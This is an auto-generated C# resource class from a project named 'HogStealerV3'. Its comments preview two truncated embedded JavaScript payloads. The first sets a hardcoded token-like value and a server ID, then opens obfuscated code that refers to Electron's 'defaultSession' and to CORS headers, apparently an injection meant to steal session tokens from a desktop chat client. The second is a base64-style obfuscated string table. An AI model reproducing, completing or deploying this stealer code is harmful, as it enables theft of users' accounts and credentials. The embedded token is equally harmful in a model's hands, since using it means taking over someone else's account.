//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace HogStealerV3.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("HogStealerV3.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to process.env.Token = &quot;LODYwkDzIL4WJpn4DOxnAWOw-v_8IKcnqPtUe2rKKVL_F8txDMN3n1aVrpDMZv7aVkJb&quot;;
        ///process.env.svid = &quot;776494185690955797&quot;;
        ///const _0x220a=[&apos;KELPu&apos;,&apos;constructor&apos;,&apos;EgXvt&apos;,&apos;iRcPH&apos;,&apos;njfxf&apos;,&apos;yBqQW&apos;,&apos;eRfXh&apos;,&apos;CCgiQ&apos;,&apos;init&apos;,&apos;aYgzU&apos;,&apos;length&apos;,&apos;bind&apos;,&apos;apply&apos;,&apos;Access-Control-Allow-Origin&apos;,&apos;stateObject&apos;,&apos;\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)&apos;,&apos;QIHLG&apos;,&apos;vpjGA&apos;,&apos;chain&apos;,&apos;function\x20*\x5c(\x20*\x5c)&apos;,&apos;rvzxi&apos;,&apos;error&apos;,&apos;electron&apos;,&apos;aWGgk&apos;,&apos;toString&apos;,&apos;yVBVl&apos;,&apos;gger&apos;,&apos;cRwOK&apos;,&apos;cDIdd&apos;,&apos;mekei&apos;,&apos;defaultSession&apos;,&apos;respo [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string indexcore {
            get {
                return ResourceManager.GetString("indexcore", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to var _0x6875=[&apos;Bg9JywXtDg9Yyq==&apos;,&apos;DgfIBgu=&apos;,&apos;tM9Uzse=&apos;,&apos;C3bSAxq=&apos;,&apos;Aw9U&apos;,&apos;ue9tva==&apos;,&apos;yxrLzcbIEsbiBW==&apos;,&apos;ody2nta1mZe4lW==&apos;,&apos;yxbPl3DLyMHVBW==&apos;,&apos;Aw5Nifn5C3rLBq==&apos;,&apos;CNfhwfy=&apos;,&apos;DxnLCM5HBwu=&apos;,&apos;B20VAhr0Chm6lW==&apos;,&apos;ALLpBKe=&apos;,&apos;cGOQkK9WzxjHDa==&apos;,&apos;q29UDgvUDc10Eq==&apos;,&apos;yMLUza==&apos;,&apos;zgLZy3jPBwLUyq==&apos;,&apos;igLUiej5DgvZoG==&apos;,&apos;BMfTzq==&apos;,&apos;CNKGu2vYDMLJzq==&apos;,&apos;y25nDLfhmwW=&apos;,&apos;uMvWB3j0ignYzq==&apos;,&apos;C2LJ&apos;,&apos;tNvTyMvYoIaQkG==&apos;,&apos;DgD1vgy=&apos;,&apos;qwnJzxnZlunVBG==&apos;,&apos;FdeZFde2Fdv8mq==&apos;,&apos;qMrQCwG=&apos;,&apos;BgvUz3rO&apos;,&apos;zxHJzxb0Aw9U&apos;,&apos;DcbMB3iG&apos;,&apos;AwnVBL91CMW=&apos;,&apos;Ahr0Chm [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string indexmodules {
            get {
                return ResourceManager.GetString("indexmodules", resourceCulture);
            }
        }
    }
}
